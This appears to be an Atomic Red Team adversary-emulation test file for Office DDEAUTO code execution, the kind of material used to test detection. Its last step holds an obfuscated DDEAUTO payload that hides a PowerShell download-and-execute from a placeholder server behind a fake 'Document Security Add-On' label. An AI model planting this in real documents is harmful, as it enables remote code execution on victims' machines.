security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1663bf7d524b6fc8a9a39104feb2949b36368dfc
atomic-red-team/atomics/T1137/T1137.yaml
T
Michael Haag d508caaffd T1137 
No .. for Casey
Other than the actual ..'s that are in the repo that are legit from Github..
2018-05-25 10:50:52 -04:00

40 lines
1.3 KiB
YAML
Raw Blame History

---
attack_technique: T1137
display_name: Office Application Startup
atomic_tests:
- name: DDEAUTO
description: |
TrustedSec - Unicorn - https://github.com/trustedsec/unicorn
SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
Word VBA Macro
[Dragon's Tail](https://github.com/redcanaryco/atomic-red-team/tree/master/ARTifacts/Adversary/Dragons_Tail)
supported_platforms:
- windows
executor:
name: manual
steps: |
1. Open Word
2. Insert tab -> Quick Parts -> Field
3. Choose = (Formula) and click ok.
4. Once the field is inserted, you should now see "!Unexpected End of Formula"
5. Right-click the Field, choose "Toggle Field Codes"
6. Paste in the code from Unicorn or SensePost
7. Save the Word document.
9. DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"
10. DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\windows\\system32\\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\\v1.0\\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString('http://<server>/download.ps1'); # " "Microsoft Document Security Add-On"
Reference in New Issue View Git Blame Copy Permalink